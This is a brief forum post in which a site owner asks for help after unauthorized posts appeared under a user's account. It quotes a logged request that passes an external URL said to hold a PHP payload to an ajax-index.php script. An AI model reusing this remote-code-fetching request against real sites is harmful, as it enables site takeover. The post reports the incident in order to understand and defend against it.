My site appears to be hacked?


I recently found some random posts have been made from one of our user’s account without the user’s consent. We checked vividly with the security plugins but didn’t found anything. While we checked our Server Logs we found something like /ajax-index.php?url=http://majoydiego.com/wp-includes/css/dist/components/style.css

This URL contains a PHP payload.

Can anyone help me understand what is this code exactly and how the hacker gets access to my user and able to post? Though I uninstalled all those plugins and tried to secure as much as possible. But I am still worried!!!